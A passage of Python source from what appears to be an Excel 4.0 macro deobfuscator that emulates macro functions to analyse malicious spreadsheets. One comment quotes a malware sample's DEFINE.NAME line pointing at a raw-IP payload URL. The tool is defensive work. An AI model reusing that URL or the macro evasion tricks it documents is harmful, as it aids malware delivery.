self.xlm_wrapper.get_xl_international_char(
XlApplicationInternational.xlLeftBracket))
macro_grammar = macro_grammar.replace('{{XLRIGHTBRACKET}}',
self.xlm_wrapper.get_xl_international_char(
XlApplicationInternational.xlRightBracket))
macro_grammar = macro_grammar.replace('{{XLLISTSEPARATOR}}',
self.xlm_wrapper.get_xl_international_char(
XlApplicationInternational.xlListSeparator))
xlm_parser = Lark(macro_grammar, parser='lalr')
return xlm_parser
def get_formula_cell(self, macrosheet, col, row):
result_cell = None
not_found = False
row = int(row)
current_row = row
current_addr = col + str(current_row)
while current_addr not in macrosheet.cells or \
macrosheet.cells[current_addr].formula is None:
if (current_row - row) < 10000:
current_row += 1
else:
not_found = True
break
current_addr = col + str(current_row)
if not_found is False:
result_cell = macrosheet.cells[current_addr]
return result_cell
def get_range_parts(self, parse_tree):
if isinstance(parse_tree, Tree) and parse_tree.data =='range':
return parse_tree.children[0], parse_tree.children[1]
else:
return None, None
def get_cell_from_workbook(self, cell_addr):
"""
Get a cell from the current workbook given a cell addr of the form
'SHEET_NAME!COLROW', where SHEET_NAME is the sheet name, COL is the column name
(alphabetic characters) and ROW is the row (integer).
"""
# Pull out the sheet name, column, and row.
addr_pat = r"'(\w+)'!([A-Z]+)(\d+)"
addr_info = re.findall(addr_pat, cell_addr)
if (len(addr_info) == 0):
# Invalid addr string.
return None
sheet_name, col, row = addr_info[0]
# Get the referenced cell.
return self.get_cell(sheet_name, col, row)
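    # A quick sketch of the address format handled above (the address
    # string is a hypothetical example):
    #
    #     re.findall(r"'(\w+)'!([A-Z]+)(\d+)", "'Macro1'!AB12")
    #     # -> [('Macro1', 'AB', '12')]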
def get_cell_addr(self, current_cell, cell_parse_tree):
res_sheet = res_col = res_row = None
if type(cell_parse_tree) is Token:
names = self.xlm_wrapper.get_defined_names()
label = cell_parse_tree.value.lower()
if label in names:
res_sheet, res_col, res_row = Cell.parse_cell_addr(names[label])
elif label.strip('"') in names:
res_sheet, res_col, res_row = Cell.parse_cell_addr(names[label.strip('"')])
else:
if len(label) > 1 and label.startswith('"') and label.endswith('"'):
label = label.strip('"')
root_parse_tree = self.xlm_parser.parse('=' + label)
res_sheet, res_col, res_row = self.get_cell_addr(current_cell, root_parse_tree.children[0])
else:
if cell_parse_tree.data == 'defined_name':
label = '{}'.format(cell_parse_tree.children[2])
formula_str = self.xlm_wrapper.get_defined_name(label)
parsed_tree = self.xlm_parser.parse('='+formula_str)
if isinstance(parsed_tree.children[0], Tree) and parsed_tree.children[0].data =='range':
start_cell, end_cell = self.get_range_parts(parsed_tree.children[0])
cell = start_cell.children[0]
else:
cell = parsed_tree.children[0].children[0]
else:
cell = cell_parse_tree.children[0]
if cell.data == 'a1_notation_cell':
if len(cell.children) == 2:
cell_addr = "'{}'!{}".format(cell.children[0], cell.children[1])
else:
cell_addr = cell.children[0]
res_sheet, res_col, res_row = Cell.parse_cell_addr(cell_addr)
if res_sheet is None and res_col is not None:
res_sheet = current_cell.sheet.name
elif cell.data == 'r1c1_notation_cell':
current_col = Cell.convert_to_column_index(current_cell.column)
current_row = int(current_cell.row)
for current_child in cell.children:
if current_child.type == 'NAME':
res_sheet = current_child.value
elif self.is_float(current_child.value):
val = int(float(current_child.value))
if last_seen == 'r':
res_row = val
else:
res_col = val
elif current_child.value.startswith('['):
val = int(current_child.value[1:-1])
if last_seen == 'r':
res_row = current_row + val
else:
res_col = current_col + val
elif current_child.lower() == 'r':
last_seen = 'r'
res_row = current_row
elif current_child.lower() == 'c':
last_seen = 'c'
res_col = current_col
else:
                        raise Exception('Cell address, Syntax Error')
if res_sheet is None:
res_sheet = current_cell.sheet.name
res_row = str(res_row)
res_col = Cell.convert_to_column_name(res_col)
else:
                raise Exception('Cell address, Syntax Error')
return res_sheet, res_col, res_row
def get_cell(self, sheet_name, col, row):
result = None
sheets = self.xlm_wrapper.get_macrosheets()
if sheet_name in sheets:
sheet = sheets[sheet_name]
addr = col + str(row)
if addr in sheet.cells:
result = sheet.cells[addr]
return result
def set_cell(self, sheet_name, col, row, text):
sheets = self.xlm_wrapper.get_macrosheets()
if sheet_name in sheets:
sheet = sheets[sheet_name]
addr = col + str(row)
if addr not in sheet.cells:
new_cell = Cell()
new_cell.column = col
new_cell.row = row
new_cell.sheet = sheet
sheet.cells[addr] = new_cell
cell = sheet.cells[addr]
text = EvalResult.unwrap_str_literal(text)
if text.startswith('='):
cell.formula = text
cell.value = text
@staticmethod
def convert_ptree_to_str(parse_tree_root):
if type(parse_tree_root) == Token:
return str(parse_tree_root)
else:
result = ''
for child in parse_tree_root.children:
result += XLMInterpreter.convert_ptree_to_str(child)
return result
def get_window(self, number):
result = None
if len(self._window_defaults) == 0:
script_dir = os.path.dirname(__file__)
config_dir = os.path.join(script_dir, 'configs')
with open(os.path.join(config_dir, 'get_window.conf'), 'r', encoding='utf_8') as workspace_conf_file:
for index, line in enumerate(workspace_conf_file):
line = line.strip()
if len(line) > 0:
if self.is_float(line) is True:
self._window_defaults[index + 1] = int(float(line))
else:
self._window_defaults[index + 1] = line
if number in self._window_defaults:
result = self._window_defaults[number]
return result
def get_workspace(self, number):
result = None
if len(self._workspace_defaults) == 0:
script_dir = os.path.dirname(__file__)
config_dir = os.path.join(script_dir, 'configs')
with open(os.path.join(config_dir, 'get_workspace.conf'), 'r', encoding='utf_8') as workspace_conf_file:
for index, line in enumerate(workspace_conf_file):
line = line.strip()
if len(line) > 0:
self._workspace_defaults[index + 1] = line
if number in self._workspace_defaults:
result = self._workspace_defaults[number]
return result
def get_default_cell_info(self, number):
result = None
if len(self._cell_defaults) == 0:
script_dir = os.path.dirname(__file__)
config_dir = os.path.join(script_dir, 'configs')
with open(os.path.join(config_dir, 'get_cell.conf'), 'r', encoding='utf_8') as workspace_conf_file:
for index, line in enumerate(workspace_conf_file):
line = line.strip()
if len(line) > 0:
self._cell_defaults[index + 1] = line
if number in self._cell_defaults:
result = self._cell_defaults[number]
return result
def evaluate_formula(self, current_cell, name, arguments, interactive, destination_arg=1):
current_cell.emulated = True
source, destination = (arguments[0], arguments[1]) if destination_arg == 1 else (arguments[1], arguments[0])
src_eval_result = self.evaluate_parse_tree(current_cell, source, interactive)
if isinstance(destination, Token):
# TODO: get_defined_name must return a list; currently it returns list or one item
destination = self.xlm_wrapper.get_defined_name(destination)
if isinstance(destination, list):
destination = [] if not destination else destination[0]
#if (not hasattr(destination, "data")):
# return EvalResult(current_cell, EvalStatus.Error, 0, "")
if destination.data == 'defined_name' or destination.data=='name':
defined_name_formula = self.xlm_wrapper.get_defined_name(destination.children[2])
if isinstance(defined_name_formula, Tree):
destination = defined_name_formula
else:
destination = self.xlm_parser.parse('='+defined_name_formula).children[0]
if destination.data == 'range':
dst_start_sheet, dst_start_col, dst_start_row = self.get_cell_addr(current_cell, destination.children[0])
dst_end_sheet, dst_end_col, dst_end_row = self.get_cell_addr(current_cell, destination.children[2])
else:
dst_start_sheet, dst_start_col, dst_start_row = self.get_cell_addr(current_cell, destination)
dst_end_sheet, dst_end_col, dst_end_row = dst_start_sheet, dst_start_col, dst_start_row
destination_str = XLMInterpreter.convert_ptree_to_str(destination)
text = src_eval_result.get_text(unwrap=True)
if src_eval_result.status == EvalStatus.FullEvaluation:
for row in range(int(dst_start_row), int(dst_end_row) + 1):
for col in range(Cell.convert_to_column_index(dst_start_col),
Cell.convert_to_column_index(dst_end_col) + 1):
if (
dst_start_sheet,
Cell.convert_to_column_name(col) + str(row)) in self.cell_with_unsuccessfull_set:
self.cell_with_unsuccessfull_set.remove((dst_start_sheet,
Cell.convert_to_column_name(col) + str(row)))
self.set_cell(dst_start_sheet,
Cell.convert_to_column_name(col),
str(row),
str(src_eval_result.value))
else:
for row in range(int(dst_start_row), int(dst_end_row) + 1):
for col in range(Cell.convert_to_column_index(dst_start_col),
Cell.convert_to_column_index(dst_end_col) + 1):
self.cell_with_unsuccessfull_set.add((dst_start_sheet,
Cell.convert_to_column_name(col) + str(row)))
if destination_arg == 1:
text = "{}({},{})".format(name,
src_eval_result.get_text(),
destination_str)
else:
text = "{}({},{})".format(name,
destination_str,
src_eval_result.get_text())
return_val = 0
return EvalResult(None, src_eval_result.status, return_val, text)
def evaluate_argument_list(self, current_cell, name, arguments):
current_cell.emulated = True
args_str = ''
for argument in arguments:
if type(argument) is Token or type(argument) is Tree:
arg_eval_Result = self.evaluate_parse_tree(current_cell, argument, False)
args_str += arg_eval_Result.get_text() + ','
args_str = args_str.strip(',')
return_val = text = '{}({})'.format(name, args_str)
status = EvalStatus.PartialEvaluation
return EvalResult(None, status, return_val, text)
def evaluate_function(self, current_cell, parse_tree_root, interactive):
current_cell.emulated = True
function_name = parse_tree_root.children[0]
if debug:
print("FUNCTION NAME!!")
print(function_name)
# OFFSET()()
if isinstance(function_name, Tree) and function_name.data == 'function_call':
if debug:
print("HERE: 1")
func_eval_result = self.evaluate_parse_tree(current_cell, function_name, False)
if func_eval_result.status != EvalStatus.FullEvaluation:
return EvalResult(func_eval_result.next_cell, func_eval_result.status, 0, XLMInterpreter.convert_ptree_to_str(parse_tree_root))
else:
func_eval_result.text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return func_eval_result
# handle alias name for a function (REGISTER)
# c45ed3a0ce5df27ac29e0fab99dc4d462f61a0d0c025e9161ced3b2c913d57d8
if function_name in self._registered_functions:
if debug:
print("HERE: 2")
parse_tree_root.children[0] = parse_tree_root.children[0].update(None,
self._registered_functions[function_name][
'name'])
return self.evaluate_function(current_cell, parse_tree_root, interactive)
# cell_function_call
if isinstance(function_name, Tree) and function_name.data == 'cell':
if debug:
print("HERE: 3")
self._function_call_stack.append(current_cell)
return self.goto_handler([function_name], current_cell, interactive, parse_tree_root)
if function_name.lower() in self.defined_names:
if debug:
print("HERE: 4")
try:
ref_parsed = self.xlm_parser.parse('='+ self.defined_names[function_name.lower()])
if isinstance(ref_parsed.children[0],Tree) and ref_parsed.children[0].data =='cell':
function_name = ref_parsed.children[0]
else:
raise Exception
except:
function_name = self.defined_names[function_name.lower()]
# cell_function_call
if isinstance(function_name, Tree) and function_name.data == 'cell':
if debug:
print("HERE: 5")
self._function_call_stack.append(current_cell)
return self.goto_handler([function_name], current_cell, interactive, parse_tree_root)
if self.ignore_processing and function_name != 'NEXT':
if debug:
print("HERE: 6")
if function_name == 'WHILE':
self.next_count += 1
return EvalResult(None, EvalStatus.IGNORED, 0, '')
arguments = []
for i in parse_tree_root.children[2].children:
if debug:
print("HERE: 7")
if type(i) is not Token:
if len(i.children) > 0:
arguments.append(i.children[0])
else:
arguments.append(i.children)
if function_name in self._handlers:
if debug:
print("HERE: 8")
eval_result = self._handlers[function_name](arguments, current_cell, interactive, parse_tree_root)
else:
if debug:
print("HERE: 9")
eval_result = self.evaluate_argument_list(current_cell, function_name, arguments)
if function_name in XLMInterpreter.jump_functions:
eval_result.output_level = 0
elif function_name in XLMInterpreter.important_functions:
eval_result.output_level = 2
else:
eval_result.output_level = 1
return eval_result
# region Handlers
def and_handler(self, arguments, current_cell, interactive, parse_tree_root):
value = True
status = EvalStatus.FullEvaluation
for arg in arguments:
arg_eval_result = self.evaluate_parse_tree(current_cell, arg, interactive)
if arg_eval_result.status == EvalStatus.FullEvaluation:
if EvalResult.unwrap_str_literal(str(arg_eval_result.value)).lower() != "true":
value = False
break
else:
status = EvalStatus.PartialEvaluation
value = False
break
return EvalResult(None, status, value, str(value))
def or_handler(self, arguments, current_cell, interactive, parse_tree_root):
value = False
status = EvalStatus.FullEvaluation
for arg in arguments:
arg_eval_result = self.evaluate_parse_tree(current_cell, arg, interactive)
if arg_eval_result.status == EvalStatus.FullEvaluation:
if EvalResult.unwrap_str_literal(str(arg_eval_result.value)).lower() == "true":
value = True
break
else:
status = EvalStatus.PartialEvaluation
break
return EvalResult(None, status, value, str(value))
def active_cell_handler(self, arguments, current_cell, interactive, parse_tree_root):
status = EvalStatus.PartialEvaluation
if self.active_cell:
if self.active_cell.formula:
parse_tree = self.xlm_parser.parse(self.active_cell.formula)
eval_res = self.evaluate_parse_tree(current_cell, parse_tree, interactive)
val = eval_res.value
status = eval_res.status
else:
val = self.active_cell.value
status = EvalStatus.FullEvaluation
return_val = val
text = str(return_val)
else:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = text
return EvalResult(None, status, return_val, text)
def get_cell_handler(self, arguments, current_cell, interactive, parse_tree_root):
if len(arguments) == 2:
arg1_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
dst_sheet, dst_col, dst_row = self.get_cell_addr(current_cell, arguments[1])
type_id = arg1_eval_result.value
if self.is_float(type_id):
type_id = int(float(type_id))
if dst_sheet is None:
dst_sheet = current_cell.sheet.name
status = EvalStatus.PartialEvaluation
if arg1_eval_result.status == EvalStatus.FullEvaluation:
data, not_exist, not_implemented = self.xlm_wrapper.get_cell_info(dst_sheet, dst_col, dst_row, type_id)
if not_exist and 1 == 2:
return_val = self.get_default_cell_info(type_id)
text = str(return_val)
status = EvalStatus.FullEvaluation
elif not_implemented:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = ''
else:
text = str(data) if data is not None else None
return_val = data
status = EvalStatus.FullEvaluation
else:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = ''
status = EvalStatus.PartialEvaluation
return EvalResult(None, status, return_val, text)
def set_name_handler(self, arguments, current_cell, interactive, parse_tree_root):
label = EvalResult.unwrap_str_literal(XLMInterpreter.convert_ptree_to_str(arguments[0])).lower()
if isinstance(arguments[1], Tree) and arguments[1].data == 'cell':
arg2_text = XLMInterpreter.convert_ptree_to_str(arguments[1])
names = self.xlm_wrapper.get_defined_names()
names[label] = arguments[1]
text = 'SET.NAME({},{})'.format(label, arg2_text)
return_val = 0
status = EvalStatus.FullEvaluation
else:
arg2_eval_result = self.evaluate_parse_tree(current_cell, arguments[1], interactive)
if arg2_eval_result.status is EvalStatus.FullEvaluation:
arg2_text = arg2_eval_result.get_text(unwrap=True)
names = self.xlm_wrapper.get_defined_names()
names[label] = arg2_text
text = 'SET.NAME({},{})'.format(label, arg2_text)
return_val = 0
status = EvalStatus.FullEvaluation
else:
return_val = text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
status = arg2_eval_result.status
return EvalResult(None, status, return_val, text)
def end_if_handler(self, arguments, current_cell, interactive, parse_tree_root):
self._indent_level -= 1
self._indent_current_line = True
status = EvalStatus.FullEvaluation
return EvalResult(None, status, 'END.IF', 'END.IF')
def get_workspace_handler(self, arguments, current_cell, interactive, parse_tree_root):
status = EvalStatus.Error
if len(arguments) == 1:
arg1_eval_Result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if arg1_eval_Result.status == EvalStatus.FullEvaluation and self.is_float(arg1_eval_Result.get_text()):
workspace_param = self.get_workspace(int(float(arg1_eval_Result.get_text())))
current_cell.value = workspace_param
text = 'GET.WORKSPACE({})'.format(arg1_eval_Result.get_text())
return_val = workspace_param
status = EvalStatus.FullEvaluation
next_cell = None
if status == EvalStatus.Error:
return_val = text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return EvalResult(None, status, return_val, text)
def get_window_handler(self, arguments, current_cell, interactive, parse_tree_root):
status = EvalStatus.Error
if len(arguments) == 1:
arg_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if arg_eval_result.status == EvalStatus.FullEvaluation and self.is_float(arg_eval_result.get_text()):
window_param = self.get_window(int(float(arg_eval_result.get_text())))
current_cell.value = window_param
text = window_param # XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = window_param
status = EvalStatus.FullEvaluation
else:
return_val = text = 'GET.WINDOW({})'.format(arg_eval_result.get_text())
status = arg_eval_result.status
if status == EvalStatus.Error:
return_val = text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return EvalResult(None, status, return_val, text)
def on_time_handler(self, arguments, current_cell, interactive, parse_tree_root):
status = EvalStatus.Error
if len(arguments) == 2:
arg1_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
next_sheet, next_col, next_row = self.get_cell_addr(current_cell, arguments[1])
sheets = self.xlm_wrapper.get_macrosheets()
if next_sheet in sheets:
next_cell = self.get_formula_cell(sheets[next_sheet], next_col, next_row)
text = 'ON.TIME({},{})'.format(arg1_eval_result.get_text(), str(next_cell))
status = EvalStatus.FullEvaluation
return_val = 0
if status == EvalStatus.Error:
return_val = text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
next_cell = None
return EvalResult(next_cell, status, return_val, text)
def concatenate_handler(self, arguments, current_cell, interactive, parse_tree_root):
text = ''
for arg in arguments:
arg_eval_result = self.evaluate_parse_tree(current_cell, arg, interactive)
text += arg_eval_result.get_text(unwrap=True)
return_val = text
text = EvalResult.wrap_str_literal(text)
status = EvalStatus.FullEvaluation
return EvalResult(None, status, return_val, text)
def day_handler(self, arguments, current_cell, interactive, parse_tree_root):
if self.day_of_month is None:
arg1_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if arg1_eval_result.status == EvalStatus.FullEvaluation:
if type(arg1_eval_result.value) is datetime.datetime:
#
# text = str(arg1_eval_result.value.day)
# return_val = text
# status = EvalStatus.FullEvaluation
return_val, status, text = self.guess_day()
elif self.is_float(arg1_eval_result.value):
text = 'DAY(Serial Date)'
status = EvalStatus.NotImplemented
else:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
status = arg1_eval_result.status
else:
text = str(self.day_of_month)
return_val = text
status = EvalStatus.FullEvaluation
return EvalResult(None, status, return_val, text)
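    # DAY() is often used as an environment check by malicious sheets. When its argument is a
    # datetime (e.g. NOW()), guess_day() below brute-forces the day of month (1-31) and keeps the
    # value that produces the most printable deobfuscated output.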
def guess_day(self):
xlm = self
min = 1
best_day = 0
for day in range(1, 32):
xlm.char_error_count = 0
non_printable_ascii = 0
total_count = 0
xlm = copy.copy(xlm)
xlm.day_of_month = day
try:
for index, step in enumerate(xlm.deobfuscate_macro(False, silent_mode=True)):
for char in step[2]:
if not (32 <= ord(char) <= 128):
non_printable_ascii += 1
total_count += len(step[2])
if index > 10 and ((non_printable_ascii + xlm.char_error_count) / total_count) > min:
break
if total_count != 0 and ((non_printable_ascii + xlm.char_error_count) / total_count) < min:
min = ((non_printable_ascii + xlm.char_error_count) / total_count)
best_day = day
if min == 0:
break
except Exception as exp:
pass
self.day_of_month = best_day
text = str(self.day_of_month)
return_val = text
status = EvalStatus.FullEvaluation
return return_val, status, text
def now_handler(self, arguments, current_cell, interactive, parse_tree_root):
return_val = text = datetime.datetime.now()
status = EvalStatus.FullEvaluation
return EvalResult(None, status, return_val, text)
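    # IF() is emulated by pushing the taken branch(es) onto self._branch_stack along with a snapshot
    # of the sheet cells; deobfuscate_macro() pops and replays them later. Revisiting a cell that
    # already sits on the branch stack is reported as a loop and ends that path.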
def if_handler(self, arguments, current_cell, interactive, parse_tree_root):
visited = False
for stack_frame in self._branch_stack:
if stack_frame[0].get_local_address() == current_cell.get_local_address():
visited = True
if visited is False:
self._indent_level += 1
size = len(arguments)
if debug:
print("IF HANDLER!!")
print(arguments)
if size == 3:
cond_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if self.is_bool(cond_eval_result.value):
cond_eval_result.value = bool(strtobool(cond_eval_result.value))
elif self.is_int(cond_eval_result.value):
if int(cond_eval_result.value) == 0:
cond_eval_result.value = True
else:
cond_eval_result.value = False
if cond_eval_result.status == EvalStatus.FullEvaluation:
if cond_eval_result.value:
if type(arguments[1]) is Tree or type(arguments[1]) is Token:
self._branch_stack.append(
(current_cell, arguments[1], current_cell.sheet.cells, self._indent_level, '[TRUE]'))
status = EvalStatus.Branching
else:
status = EvalStatus.FullEvaluation
else:
if type(arguments[2]) is Tree or type(arguments[2]) is Token:
self._branch_stack.append(
(current_cell, arguments[2], current_cell.sheet.cells, self._indent_level, '[FALSE]'))
status = EvalStatus.Branching
else:
status = EvalStatus.FullEvaluation
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
else:
memory_state = copy.deepcopy(current_cell.sheet.cells)
if type(arguments[2]) is Tree or type(arguments[2]) is Token or type(arguments[2]) is list:
self._branch_stack.append(
(current_cell, arguments[2], memory_state, self._indent_level, '[FALSE]'))
if type(arguments[1]) is Tree or type(arguments[1]) is Token or type(arguments[1]) is list:
self._branch_stack.append(
(current_cell, arguments[1], current_cell.sheet.cells, self._indent_level, '[TRUE]'))
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
status = EvalStatus.FullBranching
else:
status = EvalStatus.FullEvaluation
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
else:
# loop detected
text = '[[LOOP]]: ' + XLMInterpreter.convert_ptree_to_str(parse_tree_root)
status = EvalStatus.End
return EvalResult(None, status, 0, text)
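    # MID(text, start, count) uses Excel's 1-based start position, hence the -1 when mapping it onto
    # a Python slice below. Illustrative example: MID("ABCDEF",2,3) -> "BCD".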
    def mid_handler(self, arguments, current_cell, interactive, parse_tree_root):
        status = EvalStatus.PartialEvaluation
        return_val = None
        str_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
base_eval_result = self.evaluate_parse_tree(current_cell, arguments[1], interactive)
len_eval_result = self.evaluate_parse_tree(current_cell, arguments[2], interactive)
if str_eval_result.status == EvalStatus.FullEvaluation:
if base_eval_result.status == EvalStatus.FullEvaluation and \
len_eval_result.status == EvalStatus.FullEvaluation:
if self.is_float(base_eval_result.value) and self.is_float(len_eval_result.value):
base = int(float(base_eval_result.value)) - 1
length = int(float(len_eval_result.value))
return_val = EvalResult.unwrap_str_literal(str_eval_result.value)[base: base + length]
text = str(return_val)
status = EvalStatus.FullEvaluation
if status == EvalStatus.PartialEvaluation:
text = 'MID({},{},{})'.format(XLMInterpreter.convert_ptree_to_str(arguments[0]),
XLMInterpreter.convert_ptree_to_str(arguments[1]),
XLMInterpreter.convert_ptree_to_str(arguments[2]))
return EvalResult(None, status, return_val, text)
def define_name_handler(self, arguments, current_cell, interactive, parse_tree_root):
# DEFINE.NAME(name_text, refers_to, macro_type, shortcut_text, hidden, category, local)
# Evaluate the arguments to DEFINE.NAME()
if debug:
print("DEFINE.NAME HANDLER!!")
arg_eval_results = self.evaluate_argument_list(current_cell, "DEFINE.NAME", arguments)
if debug:
print("ARGS!!")
print(arg_eval_results)
# Set the defined name to the resolved value.
# DEFINE.NAME("HxoCNvuiUvSesa","http://195.123.242.72/IQ2Ytf5113.php",3,"J",TRUE,"Tc",FALSE)
name_pat = r'DEFINE\.NAME\("([^"]*)","([^"]*)"'
name_info = re.findall(name_pat, arg_eval_results.text)
if debug:
print(name_info)
if (len(name_info) > 0):
name, val = name_info[0]
if debug:
print("SET '" + name + "' = '" + val + "'")
self.xlm_wrapper.get_defined_names()[name] = val
# NOT CORRECT.
return arg_eval_results
def goto_handler(self, arguments, current_cell, interactive, parse_tree_root):
if debug:
print("GOTO HANDLER!!")
print(current_cell)
print(parse_tree_root)
next_sheet, next_col, next_row = self.get_cell_addr(current_cell, arguments[0])
next_cell = None
if next_sheet is not None and next_sheet in self.xlm_wrapper.get_macrosheets():
next_cell = self.get_formula_cell(self.xlm_wrapper.get_macrosheets()[next_sheet],
next_col,
next_row)
status = EvalStatus.FullEvaluation
else:
status = EvalStatus.Error
# Emulate the cell we are jumping to.
if (next_cell is not None):
# Parse the contents of the cell we jumped to.
if debug:
print("NEXT CELL!!")
print(next_cell.debug())
if (next_cell.formula is not None):
parse_tree = self.xlm_parser.parse(next_cell.formula)
func_eval_result = self.evaluate_parse_tree(next_cell, parse_tree, False)
if debug:
print("GOTO EVAL OF " + str(next_cell))
print(func_eval_result)
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = 0
return EvalResult(next_cell, status, return_val, text)
def halt_handler(self, arguments, current_cell, interactive, parse_tree_root):
return_val = text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
#status = EvalStatus.End
status = EvalStatus.FullEvaluation
self._indent_level -= 1
return EvalResult(None, status, return_val, text)
def call_handler(self, arguments, current_cell, interactive, parse_tree_root):
if debug:
print("CALL HANDLER!!")
print(current_cell.debug())
argument_texts = []
status = EvalStatus.FullEvaluation
for argument in arguments:
if debug:
print("START ARG EVAL!!" + str(argument))
arg_eval_result = self.evaluate_parse_tree(current_cell, argument, interactive)
if debug:
print("DONE ARG EVAL!!" + str(argument))
print(arg_eval_result)
if arg_eval_result.status != EvalStatus.FullEvaluation:
status = arg_eval_result.status
argument_texts.append(arg_eval_result.get_text())
list_separator = self.xlm_wrapper.get_xl_international_char(XlApplicationInternational.xlListSeparator)
text = 'CALL({})'.format(list_separator.join(argument_texts))
return_val = 0
return EvalResult(None, status, return_val, text)
def is_number_handler(self, arguments, current_cell, interactive, parse_tree_root):
eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if eval_result.status == EvalStatus.FullEvaluation:
if type(eval_result.value) is float or type(eval_result.value) is int:
return_val = True
else:
return_val = False
text = str(return_val)
else:
return_val = text = 'ISNUMBER({})'.format(eval_result.get_text())
return EvalResult(None, eval_result.status, return_val, text)
def search_handler(self, arguments, current_cell, interactive, parse_tree_root):
arg1_eval_res = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
arg2_eval_res = self.evaluate_parse_tree(current_cell, arguments[1], interactive)
if arg1_eval_res.status == EvalStatus.FullEvaluation and arg2_eval_res.status == EvalStatus.FullEvaluation:
try:
arg1_val = arg1_eval_res.get_text(unwrap=True)
arg2_val = arg2_eval_res.get_text(unwrap=True)
return_val = arg2_val.lower().index(arg1_val.lower())
text = str(return_val)
except ValueError:
return_val = None
text = ''
status = EvalStatus.FullEvaluation
else:
text = 'SEARCH({},{})'.format(arg1_eval_res.get_text(), arg2_eval_res.get_text())
return_val = 0
status = EvalStatus.PartialEvaluation
return EvalResult(None, status, return_val, text)
    def round_handler(self, arguments, current_cell, interactive, parse_tree_root):
        status = EvalStatus.PartialEvaluation
        return_val = text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
        arg1_eval_res = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
        arg2_eval_res = self.evaluate_parse_tree(current_cell, arguments[1], interactive)
        if arg1_eval_res.status == EvalStatus.FullEvaluation and arg2_eval_res.status == EvalStatus.FullEvaluation:
return_val = round(float(arg1_eval_res.value), int(float(arg2_eval_res.value)))
text = str(return_val)
status = EvalStatus.FullEvaluation
return EvalResult(None, status, return_val, text)
def directory_handler(self, arguments, current_cell, interactive, parse_tree_root):
text = r'C:\Users\user\Documents'
return_val = text
status = EvalStatus.FullEvaluation
return EvalResult(None, status, return_val, text)
def char_handler(self, arguments, current_cell, interactive, parse_tree_root):
arg_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if arg_eval_result.status == EvalStatus.FullEvaluation:
if 0 <= float(arg_eval_result.text) <= 255:
return_val = text = chr(int(float(arg_eval_result.text)))
cell = self.get_formula_cell(current_cell.sheet, current_cell.column, current_cell.row)
cell.value = text
status = EvalStatus.FullEvaluation
else:
return_val = text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
self.char_error_count += 1
status = EvalStatus.Error
else:
text = 'CHAR({})'.format(arg_eval_result.text)
return_val = text
status = EvalStatus.PartialEvaluation
return EvalResult(arg_eval_result.next_cell, status, return_val, text)
def run_handler(self, arguments, current_cell, interactive, parse_tree_root):
        size = len(arguments)
        next_cell = None
        return_val = 0
        if 1 <= size <= 2:
next_sheet, next_col, next_row = self.get_cell_addr(current_cell, arguments[0])
if next_sheet is not None and next_sheet in self.xlm_wrapper.get_macrosheets():
next_cell = self.get_formula_cell(self.xlm_wrapper.get_macrosheets()[next_sheet],
next_col,
next_row)
if size == 1:
text = 'RUN({}!{}{})'.format(next_sheet, next_col, next_row)
else:
text = 'RUN({}!{}{}, {})'.format(next_sheet, next_col, next_row,
XLMInterpreter.convert_ptree_to_str(arguments[1]))
status = EvalStatus.FullEvaluation
else:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
status = EvalStatus.Error
return_val = 0
else:
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
status = EvalStatus.Error
return EvalResult(next_cell, status, return_val, text)
def formula_handler(self, arguments, current_cell, interactive, parse_tree_root):
return self.evaluate_formula(current_cell, 'FORMULA', arguments, interactive)
def formula_fill_handler(self, arguments, current_cell, interactive, parse_tree_root):
return self.evaluate_formula(current_cell, 'FORMULA.FILL', arguments, interactive)
def set_value_handler(self, arguments, current_cell, interactive, parse_tree_root):
return self.evaluate_formula(current_cell, 'SET.VALUE', arguments, interactive, destination_arg=2)
def error_handler(self, arguments, current_cell, interactive, parse_tree_root):
return EvalResult(None, EvalStatus.FullEvaluation, 0, XLMInterpreter.convert_ptree_to_str(parse_tree_root))
def select_handler(self, arguments, current_cell, interactive, parse_tree_root):
status = EvalStatus.PartialEvaluation
range_eval_result = self.evaluate_parse_tree(current_cell, arguments[0], interactive)
if len(arguments) == 2:
# e.g., SELECT(B1:B100,B1) and SELECT(,"R[1]C")
if self.active_cell:
sheet, col, row = self.get_cell_addr(self.active_cell, arguments[1])
else:
sheet, col, row = self.get_cell_addr(current_cell, arguments[1])
if sheet:
self.active_cell = self.get_cell(sheet, col, row)
status = EvalStatus.FullEvaluation
elif isinstance(arguments[0], Token):
text = XLMInterpreter.convert_ptree_to_str(parse_tree_root)
return_val = 0
elif arguments[0].data == 'range':
# e.g., SELECT(D1:D10:D1)
sheet, col, row = self.selected_range[2]
if sheet:
self.active_cell = self.get_cell(sheet, col, row)
status = EvalStatus.FullEvaluation
elif arguments[0].data == 'cell':
# select(R1C1)
if self.active_cell:
sheet, col, row = self.get_cell_addr(self.active_cell, arguments[0])
else:
sheet, col, row = self.get_cell_addr(current_cell, arguments[0])
if sheet:
